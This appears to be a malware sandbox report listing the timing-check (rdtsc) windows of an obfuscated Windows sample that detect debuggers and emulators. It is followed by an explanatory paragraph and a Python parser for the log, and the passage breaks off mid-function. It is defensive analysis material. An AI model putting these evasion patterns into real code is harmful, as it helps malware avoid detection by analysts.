Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B077B second address: 71B0781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0781 second address: 71B07D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFBBCD95550h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FFBBCD95550h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFBBCD95557h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C40 second address: 71B0C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C46 second address: 71B0C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C4A second address: 71B0C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C4E second address: 71B0C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, 124601FFh 0x00000011 mov bl, cl 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C62 second address: 71B0C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C68 second address: 71B0C6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71B0C6C second address: 71B0CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFBBCAD7297h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200936 second address: 720093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 720093A second address: 720093E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 720093E second address: 7200944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7200944 second address: 72009A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FFBBCAD728Fh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 movzx eax, dx 0x0000001a mov edx, 56080554h 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 mov edx, 664EAAECh 0x00000028 push edi 0x00000029 call 00007FFBBCAD7290h 0x0000002e pop eax 0x0000002f pop ebx 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov ecx, edx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72009A0 second address: 72009A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72009A6 second address: 72009AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E000F second address: 71E009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e push ecx 0x0000000f jmp 00007FFBBCD9554Fh 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FFBBCD95554h 0x0000001e jmp 00007FFBBCD95555h 0x00000023 popfd 0x00000024 mov dl, ah 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push esi 0x0000002c pop ebx 0x0000002d pushfd 0x0000002e jmp 00007FFBBCD95550h 0x00000033 adc esi, 0E3F2C58h 0x00000039 jmp 00007FFBBCD9554Bh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E009D second address: 71E00C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dl, 1Ah 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E00C2 second address: 71E0137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFBBCD95557h 0x00000008 pop esi 0x00000009 mov dh, 6Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and esp, FFFFFFF0h 0x00000011 pushad 0x00000012 call 00007FFBBCD9554Eh 0x00000017 pushfd 0x00000018 jmp 00007FFBBCD95552h 0x0000001d and cl, FFFFFFA8h 0x00000020 jmp 00007FFBBCD9554Bh 0x00000025 popfd 0x00000026 pop ecx 0x00000027 mov cl, dl 0x00000029 popad 0x0000002a sub esp, 44h 0x0000002d jmp 00007FFBBCD95550h 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov ax, bx 0x00000039 push ebx 0x0000003a pop esi 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E0137 second address: 71E013D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E013D second address: 71E0141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E0141 second address: 71E0165 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bh, 0Fh 0x0000000c mov edx, ecx 0x0000000e popad 0x0000000f xchg eax, ebx 0x00000010 jmp 00007FFBBCAD728Ch 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov edx, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b mov dh, cl 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E0165 second address: 71E0179 instructions: 0x00000000 rdtsc 0x00000002 mov dl, F9h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBBCD9554Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E0179 second address: 71E01D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCAD728Ch 0x00000009 or esi, 4DC7FC28h 0x0000000f jmp 00007FFBBCAD728Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, esi 0x00000019 jmp 00007FFBBCAD7296h 0x0000001e xchg eax, edi 0x0000001f jmp 00007FFBBCAD7290h 0x00000024 push eax 0x00000025 jmp 00007FFBBCAD728Bh 0x0000002a xchg eax, edi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 71E01D9 second address: 71E01DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 71E01DD second address: 71E01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 71E01F8 second address: 71E0210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD95554h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 71E0210 second address: 71E0214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 71E0214 second address: 71E027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b jmp 00007FFBBCD95557h 0x00000010 mov dword ptr [esp+24h], 00000000h 0x00000018 jmp 00007FFBBCD95556h 0x0000001d lock bts dword ptr [edi], 00000000h 0x00000022 jmp 00007FFBBCD95550h 0x00000027 jc 00007FFC2CA87710h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FFBBCD9554Ah 0x00000036 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 71E027D second address: 71E0283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7210954 second address: 7210958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7210958 second address: 721095E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 721095E second address: 72109CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCD95552h 0x00000009 xor eax, 16DF6C38h 0x0000000f jmp 00007FFBBCD9554Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FFBBCD95558h 0x0000001b adc ecx, 39456698h 0x00000021 jmp 00007FFBBCD9554Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FFBBCD95555h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7200851 second address: 7200855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7200855 second address: 720085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 720085B second address: 7200872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7200872 second address: 7200876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7200876 second address: 720087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 720087A second address: 7200880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7200880 second address: 7200886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7200886 second address: 720088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 720088A second address: 720088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 720088E second address: 72008D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFBBCD9554Dh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FFBBCD9554Eh 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007FFBBCD9554Dh 0x0000001e pop ecx 0x0000001f jmp 00007FFBBCD95551h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 72008D8 second address: 7200906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCAD728Ah 0x00000009 jmp 00007FFBBCAD7295h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7200906 second address: 720090A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 720090A second address: 7200910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7200910 second address: 7200916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7210C10 second address: 7210C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCAD7291h 0x00000009 add eax, 386F7B86h 0x0000000f jmp 00007FFBBCAD7291h 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007FFBBCAD728Ah 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFBBCAD728Ah 0x0000002c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7210C5E second address: 7210C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7210C62 second address: 7210C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7210C68 second address: 7210CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCD9554Ch 0x00000009 add cl, FFFFFF88h 0x0000000c jmp 00007FFBBCD9554Bh 0x00000011 popfd 0x00000012 jmp 00007FFBBCD95558h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+04h] 0x0000001d jmp 00007FFBBCD95550h 0x00000022 push dword ptr [ebp+0Ch] 0x00000025 jmp 00007FFBBCD95550h 0x0000002a push dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FFBBCD9554Dh 0x00000036 xor cx, 37B6h 0x0000003b jmp 00007FFBBCD95551h 0x00000040 popfd 0x00000041 mov ah, E1h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7280A80 second address: 7280A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7280A85 second address: 7280AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+10h] 0x0000000c jmp 00007FFBBCD9554Fh 0x00000011 and dl, 00000007h 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFBBCD95554h 0x0000001b and al, FFFFFFD8h 0x0000001e jmp 00007FFBBCD9554Bh 0x00000023 popfd 0x00000024 call 00007FFBBCD95558h 0x00000029 mov cx, 3C11h 0x0000002d pop esi 0x0000002e popad 0x0000002f test eax, eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FFBBCD9554Fh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7280AFB second address: 7280B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7280B01 second address: 7280B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7280B08 second address: 7280B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FFC2C74C969h 0x0000000d jmp 00007FFBBCAD728Ah 0x00000012 sub ecx, ecx 0x00000014 jmp 00007FFBBCAD7291h 0x00000019 inc ecx 0x0000001a pushad 0x0000001b mov edi, esi 0x0000001d mov si, 0E2Fh 0x00000021 popad 0x00000022 shr eax, 1 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7280B43 second address: 7280B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7280B47 second address: 7280B4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7280B4B second address: 7280B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7280B51 second address: 7280B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7280B57 second address: 7280B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7260C48 second address: 7260C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7260C4C second address: 7260C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7260C52 second address: 7260C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, C563h 0x00000007 pushfd 0x00000008 jmp 00007FFBBCAD7298h 0x0000000d sbb si, F7A8h 0x00000012 jmp 00007FFBBCAD728Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov cx, EE31h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7260C8E second address: 7260CE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FFBBCD95555h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov dh, cl 0x00000016 mov al, dl 0x00000018 popad 0x00000019 jmp 00007FFBBCD95550h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FFBBCD95557h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7260CE3 second address: 7260CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7260CE9 second address: 7260CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7260CED second address: 7260CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 727050C second address: 7270510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7270510 second address: 7270522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exe | RDTSC instruction interceptor: First address: 7270522 second address: 727058E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFBBCD95556h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FFBBCD95550h 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FFBBCD95550h 0x0000001c push eax 0x0000001d pushad 0x0000001e mov eax, edi 0x00000020 call 00007FFBBCD9554Dh 0x00000025 mov ah, EDh 0x00000027 pop edi 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov di, 0908h 0x00000031 mov edi, 0A21ADB4h 0x00000036 popad 0x00000037 rdtsc
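Each interceptor line above records one window between two consecutive rdtsc executions: the protector reads the timestamp counter, runs a few instructions, reads it again and later compares the two values; an implausibly large delta betrays single-stepping, emulation or a hypervisor that traps rdtsc. Because the second address of one line is the first address of the next, the lines chain into runs of back-to-back reads with only push/pop filler and jmps between them, and the jmps hop over gaps, so the address span of a window is larger than the bytes disassembled in it. The parser below is an added example (not Joe Sandbox tooling and not code from the sample) that turns such lines into structured windows, separates filler from payload instructions and counts the distinct rdtsc reads per chain. The five sample lines are copied from this report, with the fused "Source" cell separated from the event text.

```python
"""Parse Joe Sandbox 'RDTSC instruction interceptor' lines and quantify the
timing-check chains they describe. Added example, not Joe Sandbox tooling."""
import re
from dataclasses import dataclass

# Constructed input: the first five interceptor lines of this report.
PREFIX = "Source: C:\\Users\\user\\Desktop\\HrIrtCXI3s.exe | RDTSC instruction interceptor: "
SAMPLE_LINES = [
    PREFIX + "First address: 71E01DD second address: 71E01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc",
    PREFIX + "First address: 71E01F8 second address: 71E0210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD95554h 0x00000009 rdtsc",
    PREFIX + "First address: 71E0210 second address: 71E0214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    PREFIX + "First address: 71E0214 second address: 71E027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, dword ptr [ebp+08h] 0x0000000b jmp 00007FFBBCD95557h 0x00000010 mov dword ptr [esp+24h], 00000000h 0x00000018 jmp 00007FFBBCD95556h 0x0000001d lock bts dword ptr [edi], 00000000h 0x00000022 jmp 00007FFBBCD95550h 0x00000027 jc 00007FFC2CA87710h 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FFBBCD9554Ah 0x00000036 rdtsc",
    PREFIX + "First address: 71E027D second address: 71E0283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc",
]

HEADER_RE = re.compile(r"RDTSC instruction interceptor: First address: ([0-9A-Fa-f]+) "
                       r"second address: ([0-9A-Fa-f]+) instructions: (.*)$")
# One instruction is "0x<8 hex digit offset> <text>", ending at the next offset or the line end.
INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8}) (.+?)(?= 0x[0-9A-Fa-f]{8} |$)")
# Stack juggling and unconditional jumps woven between the two reads; no program logic.
FILLER = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "jmp"}
PREFIXES = {"lock", "rep", "repe", "repne"}


@dataclass
class Window:
    first: int
    second: int
    insns: list  # [(offset, mnemonic, text), ...]

    @property
    def span(self):
        """Bytes between the two rdtsc reads; exceeds the disassembled bytes when jmps skip gaps."""
        return self.second - self.first

    def mnemonics(self):
        return [m for _, m, _ in self.insns]

    def payload(self):
        """Instructions that are neither rdtsc nor filler: the real work inside the window."""
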